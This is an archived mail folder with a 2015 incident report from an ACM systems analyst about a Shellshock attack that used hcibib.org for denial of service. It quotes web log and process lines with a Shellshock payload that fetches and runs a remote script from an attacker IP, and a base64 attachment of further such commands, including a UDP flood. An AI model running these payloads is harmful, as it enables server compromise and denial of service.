From MAILER-DAEMON Mon Sep 21 11:47:15 2015 Date: 21 Sep 2015 11:47:15 -0400 From: Mail System Internal Data Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA X-IMAP: 1442850435 0000000000 Status: RO This text is part of the internal format of your mail folder, and is not a real message. It is created automatically by the mail system software. If deleted, important folder data will be lost, and it will be re-created with the data reset to initial values. From SRS0+0c827f6c0b131e60=FR=hq.acm.org=greenberg@srs.acm.org Wed May 6 19:34:24 2015 Return-Path: Received: from acmsmtp02.acm.org ([172.16.10.79]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t46NYNiI003817 for ; Wed, 6 May 2015 19:34:23 -0400 Received: from in-009.ord.mailroute.net by acmsmtp02.acm.org (ACM Email Forwarding Service) with ESMTP (SSL) id 2201505061934254713 for ; Wed, 06 May 2015 19:34:25 -0400 Received: from localhost (localhost.localdomain [127.0.0.1]) by in-009.ord.mailroute.net (Postfix) with ESMTP id 3lhvQT734xz1dyqf for ; Wed, 6 May 2015 23:34:25 +0000 (UTC) X-Virus-Scanned: by MailRoute X-Spam-Flag: NO X-Spam-Score: 2.539 X-Spam-Level: ** X-Spam-Status: No, score=2.539 tagged_above=-9999 tests=[HTML_MESSAGE=0.001, KAM_BADIPHTTP=2, KAM_LOTSOFHASH=0.25, NORMAL_HTTP_TO_IP=0.001, RCVD_IN_BACKSCATTERER=0.5, RCVD_IN_MSPIKE_H2=-0.211, SPF_HELO_PASS=-0.001, SPF_PASS=-0.001] autolearn=disabled Received: from in-009.ord.mailroute.net ([199.89.2.12]) by localhost (009.ord.mailroute.net [127.0.0.1]) (mroute_mailscanner, port 10024) with LMTP id yjXLQj-1fb5D; Wed, 6 May 2015 23:34:20 +0000 (UTC) Received: from na01-bl2-obe.outbound.protection.outlook.com (mail-bl2on0085.outbound.protection.outlook.com [65.55.169.85]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-SHA384 (256/256 bits)) (No client certificate requested) by in-009.ord.mailroute.net (Postfix) with ESMTPS id 3lhvQM1tJtz1f0QQ; Wed, 6 May 2015 23:34:18 +0000 (UTC) Received: from BN3PR0501MB1235.namprd05.prod.outlook.com (25.160.183.139) by BLUPR0501MB1826.namprd05.prod.outlook.com (25.163.121.149) with Microsoft SMTP Server (TLS) id 15.1.154.19; Wed, 6 May 2015 23:34:16 +0000 Received: from BN3PR0501MB1235.namprd05.prod.outlook.com ([25.160.183.139]) by BN3PR0501MB1235.namprd05.prod.outlook.com ([25.160.183.139]) with mapi id 15.01.0154.018; Wed, 6 May 2015 23:34:16 +0000 From: Adam Greenberg To: "perlman@acm.org" CC: Ken Bauer , ishelpdesk Subject: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMg== Importance: high X-Priority: 1 Date: Wed, 6 May 2015 23:34:16 +0000 Message-ID: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: yes X-MS-TNEF-Correlator: authentication-results: acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:BLUPR0501MB1826; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:BLUPR0501MB1826;BCL:0;PCL:0;RULEID:;SRVR:BLUPR0501MB1826; x-forefront-prvs: 0568F32D91 x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6009001)(6019001)(269900001)(43234003)(74316001)(2656002)(46102003)(15975445007)(92566002)(76576001)(19580395003)(86362001)(54356999)(81686999)(19580405001)(87936001)(33656002)(2900100001)(16236675004)(50986999)(19625215002)(66066001)(102836002)(99936001)(229853001)(122556002)(5890100001)(189998001)(99286002)(2351001)(62966003)(2501003)(77156002)(5001960100002)(40100003)(450100001)(110136002)(19300405004)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:BLUPR0501MB1826;H:BN3PR0501MB1235.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: multipart/mixed; boundary="_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 06 May 2015 23:34:16.1289 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: BLUPR0501MB1826 Status: R X-Status: A X-Keywords: --_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_ Content-Type: multipart/alternative; boundary="_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_" --_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hello Gary, I had to take the hcibib.org website offline tonight. The site was used t= o execute a denial of service attack that took down the server. Here is the reference from the hcibib.org weblogs 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "= -" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.7= 5.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.s= h;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" I put the entire weblog for today to your /home/Perlman The request executed a denial of service attack that started this. apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd= .sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://6= 2.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 Attached is a sample of what was running on the server. I have changed the default document root of the website until I hear from y= ou. I would prefer to bring the site back online restricted to the IP addr= ess that you will be connecting from so that you have time to properly exam= ine you site and then we can open it back up. Please let me know the IP ad= dress you will be connecting from and I will make the appropriate configura= tion changes. Thanks Adam Adam Greenberg Senior Systems Analyst Association for Computing Machinery 2 Penn Plaza Suite 701 New York, NY 10121 Office: 212-626-0573 greenberg@acm.org --_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_ Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

Hello Gary,

I had to take the hcibib.org website offline tonight= .   The site was used to execute a denial of service attack that = took down the server.

Here is the reference from the hcibib.org weblogs

 

62.75.145.250 - - [06/May/2015:12:12:39 -0400] "= ;GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c= 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.= sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"

 

I put the entire weblog for today to your /home/Perl= man

 

The request executed a denial of service attack that= started this.

apache   28593     1&n= bsp; 0 12:12 ?        00:00:00 /bin/bash= -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/d= d.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh = /tmp/dd1.sh 0>&1

 

Attached is a sample of what was running on the serv= er.

 

I have changed the default document root of the webs= ite until I hear from you.  I would prefer to bring the site back onli= ne restricted to the IP address that you will be connecting from so that yo= u have time to properly examine you site and then we can open it back up.  Please let me know the IP address y= ou will be connecting from and I will make the appropriate configuration ch= anges.

 

Thanks

Adam

 

 

Adam Greenberg

Senior Systems Analyst

Association for Computing Machinery

2 Penn Plaza

Suite 701

New York, NY 10121

Office: 212-626-0573

greenberg@acm.org

 

--_000_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_-- --_004_BN3PR0501MB123593A3CC77235DDD7190659FD00BN3PR0501MB1235_ Content-Type: text/plain; name="hcibib-exploit-5-6-2015.txt" Content-Description: hcibib-exploit-5-6-2015.txt Content-Disposition: attachment; filename="hcibib-exploit-5-6-2015.txt"; size=9414; creation-date="Wed, 06 May 2015 23:30:29 GMT"; modification-date="Wed, 06 May 2015 23:30:29 GMT" Content-Transfer-Encoding: base64 YXBhY2hlICAgMjg1OTMgICAgIDEgIDAgMTI6MTIgPyAgICAgICAgMDA6MDA6MDAgL2Jpbi9iYXNo IC1jIHJtIC1yZiAvdG1wL2RkLnNoIC90bXAvZGQxLnNoO3dnZXQgaHR0cDovLzYyLjc1LjE0NS4y NTAvZGQuc2ggLU8gL3RtcC9kZC5zaDtjdXJsIGh0dHA6Ly82Mi43NS4xNDUuMjUwL2RkLnNoIC1v IC90bXAvZGQxLnNoO3NoIC90bXAvZGQuc2ggJiBzaCAvdG1wL2RkMS5zaCAwPiYxDQoNCg0KYXBh Y2hlICAgMTk4MDggIDAuMCAgMC4wICA0NTQwIDE2MzIgPyAgICAgICAgUyAgICAxNzozNyAgIDA6 MDAgY3VybCBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS9lc2NvcnRzP2FqYXggLUggQ29va2llOiBz aG93RmlsdGVyPXRydWU7IHNvcnRpbmc9cjsgc29ydGluZ01hcD1yYW5kb207IFBIUFNFU1NJRD0x DQoyNzkwZjIzZDYzM2VkOGQzODc5ZTc4MzVlODI4Yzg2OyAxOD0xOyBsbj1lbiAtSCBPcmlnaW46 IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tIC1IIEFjY2VwdC1MYW5ndWFnZTogcm8sZW4tVVM7cT0w LjgsZW47cT0wLjYscnU7cT0wLjQgLUggVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3Mg TlQgNi4NCjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzAuOTkgKEtIVE1MLCBsaWtlIEdlY2tvKSBD aHJvbWUvNDAuMS43NzEuMTE5IFNhZmFyaS81MzcuMjYgLUggQ29udGVudC10eXBlOiBhcHBsaWNh dGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUggQWNjZXB0OiB0ZXh0 L2phdmFzY3JpcA0KdCwgdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94bWwsIHRleHQveG1sLCAqLyog LUggUmVmZXJlcjogaHR0cDovL3d3dy42YW5ub25jZS5jb20vIC1IIFgtUmVxdWVzdGVkLVdpdGg6 IFhNTEh0dHBSZXF1ZXN0IC1IIENvbm5lY3Rpb246IGtlZXAtYWxpdmUgLS1kYXRhIHNvcnQ9ciZu YW1lPWFhY2UmdmlkZW89DQomcmV2aWV3PSZpc19vbmxpbmVfbm93PSYgLS1jb21wcmVzc2VkDQph cGFjaGUgICAyMDY0NiAgMC4wICAwLjAgIDQ2MTIgMTYyOCA/ICAgICAgICBTICAgIDE3OjM4ICAg MDowMCBjdXJsIGh0dHA6Ly93d3cuNmFubm9uY2UuY29tL2VzY29ydHM/YWpheCAtSCBDb29raWU6 IHNob3dGaWx0ZXI9dHJ1ZTsgc29ydGluZz1yOyBzb3J0aW5nTWFwPXJhbmRvbTsgUEhQU0VTU0lE PTQNCjQ2Y2ZhODc3ZWY5MWYwYTRmOGFjZjQ0MTc4NDBlOGU7IDE4PTE7IGxuPWVuIC1IIE9yaWdp bjogaHR0cDovL3d3dy42YW5ub25jZS5jb20gLUggQWNjZXB0LUxhbmd1YWdlOiBybyxlbi1VUztx PTAuOCxlbjtxPTAuNixydTtxPTAuNCAtSCBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93 cyBOVCA2Lg0KMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzMC45OSAoS0hUTUwsIGxpa2UgR2Vja28p IENocm9tZS80MC4xLjc3MS4xMTkgU2FmYXJpLzUzNy4yNiAtSCBDb250ZW50LXR5cGU6IGFwcGxp Y2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsgY2hhcnNldD1VVEYtOCAtSCBBY2NlcHQ6IHRl eHQvamF2YXNjcmlwDQp0LCB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3htbCwgdGV4dC94bWwsICov KiAtSCBSZWZlcmVyOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS8gLUggWC1SZXF1ZXN0ZWQtV2l0 aDogWE1MSHR0cFJlcXVlc3QgLUggQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSAtLWRhdGEgc29ydD1y Jm5hbWU9Y2NhZCZ2aWRlbz0NCiZyZXZpZXc9JmlzX29ubGluZV9ub3c9JiAtLWNvbXByZXNzZWQN CmFwYWNoZSAgIDI0MDEyICAwLjAgIDAuMCAgMzQ2NCAxMDQwID8gICAgICAgIFMgICAgMTU6Mzgg ICAwOjAwIC9iaW4vYmFzaCAtYyBybSAtcmYgL3RtcC91ZHAucGw7d2dldCBodHRwOi8vNjIuNzUu MTQ1LjI1MC91ZHAucGwgLU8gL3RtcC91ZHAucGw7Y3VybCBodHRwOi8vNjIuNzUuMTQ1LjI1MC91 ZHAucA0KbCAtbyAvdG1wL3VkcHAucGw7cGVybCAvdG1wL3VkcC5wbCAxOTUuMTQxLjQ0LjE0NiAw IDAgJiBwZXJsIC90bXAvdWRwcC5wbCAxOTUuMTQxLjQ0LjE0NiAwIDAgMD4mMQ0KYXBhY2hlICAg MjY5OTYgIDAuMCAgMC4wICA0OTU2IDE1OTYgPyAgICAgICAgUyAgICAxNzo0MiAgIDA6MDAgY3Vy bCBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS9lc2NvcnRzP2FqYXggLUggQ29va2llOiBzaG93Rmls dGVyPXRydWU7IHNvcnRpbmc9cjsgc29ydGluZ01hcD1yYW5kb207IFBIUFNFU1NJRD1mDQowMzIx MmEyZmYyMjE3ZmVjZTU2MWZjMGFhYTliOGVjOyAxOD0xOyBsbj1lbiAtSCBPcmlnaW46IGh0dHA6 Ly93d3cuNmFubm9uY2UuY29tIC1IIEFjY2VwdC1MYW5ndWFnZTogcm8sZW4tVVM7cT0wLjgsZW47 cT0wLjYscnU7cT0wLjQgLUggVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4N CjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzAuOTkgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUv NDAuMS43NzEuMTE5IFNhZmFyaS81MzcuMjYgLUggQ29udGVudC10eXBlOiBhcHBsaWNhdGlvbi94 LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUggQWNjZXB0OiB0ZXh0L2phdmFz Y3JpcA0KdCwgdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94bWwsIHRleHQveG1sLCAqLyogLUggUmVm ZXJlcjogaHR0cDovL3d3dy42YW5ub25jZS5jb20vIC1IIFgtUmVxdWVzdGVkLVdpdGg6IFhNTEh0 dHBSZXF1ZXN0IC1IIENvbm5lY3Rpb246IGtlZXAtYWxpdmUgLS1kYXRhIHNvcnQ9ciZuYW1lPWRl YWYmdmlkZW89DQomcmV2aWV3PSZpc19vbmxpbmVfbm93PSYgLS1jb21wcmVzc2VkDQphcGFjaGUg ICAyNzAwNyAgMC4wICAwLjAgIDUwMjAgMTYwMCA/ICAgICAgICBTICAgIDE3OjQyICAgMDowMCBj dXJsIGh0dHA6Ly93d3cuNmFubm9uY2UuY29tL2VzY29ydHM/YWpheCAtSCBDb29raWU6IHNob3dG aWx0ZXI9dHJ1ZTsgc29ydGluZz1yOyBzb3J0aW5nTWFwPXJhbmRvbTsgUEhQU0VTU0lEPTANCjcx Y2I5ZTAzMWE1MzZhNmVlNDBlYTRiYjYwYzhmYTY7IDE4PTE7IGxuPWVuIC1IIE9yaWdpbjogaHR0 cDovL3d3dy42YW5ub25jZS5jb20gLUggQWNjZXB0LUxhbmd1YWdlOiBybyxlbi1VUztxPTAuOCxl bjtxPTAuNixydTtxPTAuNCAtSCBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2 Lg0KMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzMC45OSAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9t ZS80MC4xLjc3MS4xMTkgU2FmYXJpLzUzNy4yNiAtSCBDb250ZW50LXR5cGU6IGFwcGxpY2F0aW9u L3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsgY2hhcnNldD1VVEYtOCAtSCBBY2NlcHQ6IHRleHQvamF2 YXNjcmlwDQp0LCB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3htbCwgdGV4dC94bWwsICovKiAtSCBS ZWZlcmVyOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS8gLUggWC1SZXF1ZXN0ZWQtV2l0aDogWE1M SHR0cFJlcXVlc3QgLUggQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSAtLWRhdGEgc29ydD1yJm5hbWU9 YWFhZSZ2aWRlbz0NCiZyZXZpZXc9JmlzX29ubGluZV9ub3c9JiAtLWNvbXByZXNzZWQNCmFwYWNo ZSAgIDI3MDE4ICAwLjAgIDAuMCAgNDY3MiAxNjAwID8gICAgICAgIFMgICAgMTc6NDIgICAwOjAw IGN1cmwgaHR0cDovL3d3dy42YW5ub25jZS5jb20vZXNjb3J0cz9hamF4IC1IIENvb2tpZTogc2hv d0ZpbHRlcj10cnVlOyBzb3J0aW5nPXI7IHNvcnRpbmdNYXA9cmFuZG9tOyBQSFBTRVNTSUQ9OQ0K Yjc0MTMxOGVjOTFiYTY4NmZiMjU2YWQ4OTYzYjYxYjsgMTg9MTsgbG49ZW4gLUggT3JpZ2luOiBo dHRwOi8vd3d3LjZhbm5vbmNlLmNvbSAtSCBBY2NlcHQtTGFuZ3VhZ2U6IHJvLGVuLVVTO3E9MC44 LGVuO3E9MC42LHJ1O3E9MC40IC1IIFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5U IDYuDQoxOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTMwLjk5IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hy b21lLzQwLjEuNzcxLjExOSBTYWZhcmkvNTM3LjI2IC1IIENvbnRlbnQtdHlwZTogYXBwbGljYXRp b24veC13d3ctZm9ybS11cmxlbmNvZGVkOyBjaGFyc2V0PVVURi04IC1IIEFjY2VwdDogdGV4dC9q YXZhc2NyaXANCnQsIHRleHQvaHRtbCwgYXBwbGljYXRpb24veG1sLCB0ZXh0L3htbCwgKi8qIC1I IFJlZmVyZXI6IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tLyAtSCBYLVJlcXVlc3RlZC1XaXRoOiBY TUxIdHRwUmVxdWVzdCAtSCBDb25uZWN0aW9uOiBrZWVwLWFsaXZlIC0tZGF0YSBzb3J0PXImbmFt ZT1kZWZlJnZpZGVvPQ0KJnJldmlldz0maXNfb25saW5lX25vdz0mIC0tY29tcHJlc3NlZA0KYXBh Y2hlICAgMjcwMjkgIDAuMCAgMC4wICA0NDY4IDE2MDAgPyAgICAgICAgUyAgICAxNzo0MiAgIDA6 MDAgY3VybCBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS9lc2NvcnRzP2FqYXggLUggQ29va2llOiBz aG93RmlsdGVyPXRydWU7IHNvcnRpbmc9cjsgc29ydGluZ01hcD1yYW5kb207IFBIUFNFU1NJRD1l DQo4MDQwOWI5OWIxOThiYTkzZTk0MmQxOGFiNDYzNzdhOyAxOD0xOyBsbj1lbiAtSCBPcmlnaW46 IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tIC1IIEFjY2VwdC1MYW5ndWFnZTogcm8sZW4tVVM7cT0w LjgsZW47cT0wLjYscnU7cT0wLjQgLUggVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3Mg TlQgNi4NCjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzAuOTkgKEtIVE1MLCBsaWtlIEdlY2tvKSBD aHJvbWUvNDAuMS43NzEuMTE5IFNhZmFyaS81MzcuMjYgLUggQ29udGVudC10eXBlOiBhcHBsaWNh dGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUggQWNjZXB0OiB0ZXh0 L2phdmFzY3JpcA0KdCwgdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94bWwsIHRleHQveG1sLCAqLyog LUggUmVmZXJlcjogaHR0cDovL3d3dy42YW5ub25jZS5jb20vIC1IIFgtUmVxdWVzdGVkLVdpdGg6 IFhNTEh0dHBSZXF1ZXN0IC1IIENvbm5lY3Rpb246IGtlZXAtYWxpdmUgLS1kYXRhIHNvcnQ9ciZu YW1lPWRkZGUmdmlkZW89DQomcmV2aWV3PSZpc19vbmxpbmVfbm93PSYgLS1jb21wcmVzc2VkDQph cGFjaGUgICAyNzA0MCAgMC4wICAwLjAgIDUwNDggMTU5NiA/ICAgICAgICBTICAgIDE3OjQyICAg MDowMCBjdXJsIGh0dHA6Ly93d3cuNmFubm9uY2UuY29tL2VzY29ydHM/YWpheCAtSCBDb29raWU6 IHNob3dGaWx0ZXI9dHJ1ZTsgc29ydGluZz1yOyBzb3J0aW5nTWFwPXJhbmRvbTsgUEhQU0VTU0lE PWMNCmViNjdkMGZhNmI3NjFhNWJjMWY5ZjAzZDIyYWQ3YjU7IDE4PTE7IGxuPWVuIC1IIE9yaWdp bjogaHR0cDovL3d3dy42YW5ub25jZS5jb20gLUggQWNjZXB0LUxhbmd1YWdlOiBybyxlbi1VUztx PTAuOCxlbjtxPTAuNixydTtxPTAuNCAtSCBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93 cyBOVCA2Lg0KMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzMC45OSAoS0hUTUwsIGxpa2UgR2Vja28p IENocm9tZS80MC4xLjc3MS4xMTkgU2FmYXJpLzUzNy4yNiAtSCBDb250ZW50LXR5cGU6IGFwcGxp Y2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsgY2hhcnNldD1VVEYtOCAtSCBBY2NlcHQ6IHRl eHQvamF2YXNjcmlwDQp0LCB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3htbCwgdGV4dC94bWwsICov KiAtSCBSZWZlcmVyOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS8gLUggWC1SZXF1ZXN0ZWQtV2l0 aDogWE1MSHR0cFJlcXVlc3QgLUggQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSAtLWRhdGEgc29ydD1y Jm5hbWU9ZmJlZiZ2aWRlbz0NCiZyZXZpZXc9JmlzX29ubGluZV9ub3c9JiAtLWNvbXByZXNzZWQN CmFwYWNoZSAgIDI3MDUxICAwLjAgIDAuMCAgNDY2MCAxNjAwID8gICAgICAgIFMgICAgMTc6NDIg ICAwOjAwIGN1cmwgaHR0cDovL3d3dy42YW5ub25jZS5jb20vZXNjb3J0cz9hamF4IC1IIENvb2tp ZTogc2hvd0ZpbHRlcj10cnVlOyBzb3J0aW5nPXI7IHNvcnRpbmdNYXA9cmFuZG9tOyBQSFBTRVNT SUQ9MQ0KNjQ5NjY3NzM2NDc0YWNhMTI4OTI0MjYxYmI0Njk4MDsgMTg9MTsgbG49ZW4gLUggT3Jp Z2luOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbSAtSCBBY2NlcHQtTGFuZ3VhZ2U6IHJvLGVuLVVT O3E9MC44LGVuO3E9MC42LHJ1O3E9MC40IC1IIFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5k b3dzIE5UIDYuDQoxOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTMwLjk5IChLSFRNTCwgbGlrZSBHZWNr bykgQ2hyb21lLzQwLjEuNzcxLjExOSBTYWZhcmkvNTM3LjI2IC1IIENvbnRlbnQtdHlwZTogYXBw bGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkOyBjaGFyc2V0PVVURi04IC1IIEFjY2VwdDog dGV4dC9qYXZhc2NyaXANCnQsIHRleHQvaHRtbCwgYXBwbGljYXRpb24veG1sLCB0ZXh0L3htbCwg Ki8qIC1IIFJlZmVyZXI6IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tLyAtSCBYLVJlcXVlc3RlZC1X aXRoOiBYTUxIdHRwUmVxdWVzdCAtSCBDb25uZWN0aW9uOiBrZWVwLWFsaXZlIC0tZGF0YSBzb3J0 PXImbmFtZT1jZGZhJnZpZGVvPQ0KJnJldmlldz0maXNfb25saW5lX25vdz0mIC0tY29tcHJlc3Nl ZA0KYXBhY2hlICAgMjcwNjIgIDAuMCAgMC4wICA0MTc2IDE2MDAgPyAgICAgICAgUyAgICAxNzo0 MiAgIDA6MDAgY3VybCBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS9lc2NvcnRzP2FqYXggLUggQ29v a2llOiBzaG93RmlsdGVyPXRydWU7IHNvcnRpbmc9cjsgc29ydGluZ01hcD1yYW5kb207IFBIUFNF U1NJRD04DQo2ZTVmYTBiYzEyMmM1NjllMTM3YmQ2NjZjMjI5MTdlOyAxOD0xOyBsbj1lbiAtSCBP cmlnaW46IGh0dHA6Ly93d3cuNmFubm9uY2UuY29tIC1IIEFjY2VwdC1MYW5ndWFnZTogcm8sZW4t VVM7cT0wLjgsZW47cT0wLjYscnU7cT0wLjQgLUggVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdp bmRvd3MgTlQgNi4NCjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzAuOTkgKEtIVE1MLCBsaWtlIEdl Y2tvKSBDaHJvbWUvNDAuMS43NzEuMTE5IFNhZmFyaS81MzcuMjYgLUggQ29udGVudC10eXBlOiBh cHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQ7IGNoYXJzZXQ9VVRGLTggLUggQWNjZXB0 OiB0ZXh0L2phdmFzY3JpcA0KdCwgdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94bWwsIHRleHQveG1s LCAqLyogLUggUmVmZXJlcjogaHR0cDovL3d3dy42YW5ub25jZS5jb20vIC1IIFgtUmVxdWVzdGVk LVdpdGg6IFhNTEh0dHBSZXF1ZXN0IC1IIENvbm5lY3Rpb246IGtlZXAtYWxpdmUgLS1kYXRhIHNv cnQ9ciZuYW1lPWNlYWEmdmlkZW89DQomcmV2aWV3PSZpc19vbmxpbmVfbm93PSYgLS1jb21wcmVz c2VkDQphcGFjaGUgICAyNzEwMCAgMC4wICAwLjAgIDU2MDQgMTYwMCA/ICAgICAgICBTICAgIDE3 OjQyICAgMDowMCBjdXJsIGh0dHA6Ly93d3cuNmFubm9uY2UuY29tL2VzY29ydHM/YWpheCAtSCBD b29raWU6IHNob3dGaWx0ZXI9dHJ1ZTsgc29ydGluZz1yOyBzb3J0aW5nTWFwPXJhbmRvbTsgUEhQ U0VTU0lEPTQNCmNkNjcxNGRkMjczYTMwNmM4MTQ0OTg0MjliODA0MjU7IDE4PTE7IGxuPWVuIC1I IE9yaWdpbjogaHR0cDovL3d3dy42YW5ub25jZS5jb20gLUggQWNjZXB0LUxhbmd1YWdlOiBybyxl bi1VUztxPTAuOCxlbjtxPTAuNixydTtxPTAuNCAtSCBVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAo V2luZG93cyBOVCA2Lg0KMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzMC45OSAoS0hUTUwsIGxpa2Ug R2Vja28pIENocm9tZS80MC4xLjc3MS4xMTkgU2FmYXJpLzUzNy4yNiAtSCBDb250ZW50LXR5cGU6 IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZDsgY2hhcnNldD1VVEYtOCAtSCBBY2Nl cHQ6IHRleHQvamF2YXNjcmlwDQp0LCB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3htbCwgdGV4dC94 bWwsICovKiAtSCBSZWZlcmVyOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbS8gLUggWC1SZXF1ZXN0 ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QgLUggQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSAtLWRhdGEg c29ydD1yJm5hbWU9Y2NlYiZ2aWRlbz0NCiZyZXZpZXc9JmlzX29ubGluZV9ub3c9JiAtLWNvbXBy ZXNzZWQNCmFwYWNoZSAgIDI3MTExICAwLjAgIDAuMCAgNDUyMCAxNjAwID8gICAgICAgIFMgICAg MTc6NDIgICAwOjAwIGN1cmwgaHR0cDovL3d3dy42YW5ub25jZS5jb20vZXNjb3J0cz9hamF4IC1I IENvb2tpZTogc2hvd0ZpbHRlcj10cnVlOyBzb3J0aW5nPXI7IHNvcnRpbmdNYXA9cmFuZG9tOyBQ SFBTRVNTSUQ9Mw0KMzYzYzVlZDBlNzZlNWFiNDhkNzQ0NjM3MzgzNjYzZjsgMTg9MTsgbG49ZW4g LUggT3JpZ2luOiBodHRwOi8vd3d3LjZhbm5vbmNlLmNvbSAtSCBBY2NlcHQtTGFuZ3VhZ2U6IHJv LGVuLVVTO3E9MC44LGVuO3E9MC42LHJ1O3E9MC40IC1IIFVzZXItQWdlbnQ6IE1vemlsbGEvNS4w IChXaW5kb3dzIE5UIDYuDQoxOyBXT1c2NCkgQXBwbGVXZWJLaXQvNTMwLjk5IChLSFRNTCwgbGlr ZSBHZWNrbykgQ2hyb21lLzQwLjEuNzcxLjExOSBTYWZhcmkvNTM3LjI2IC1IIENvbnRlbnQtdHlw 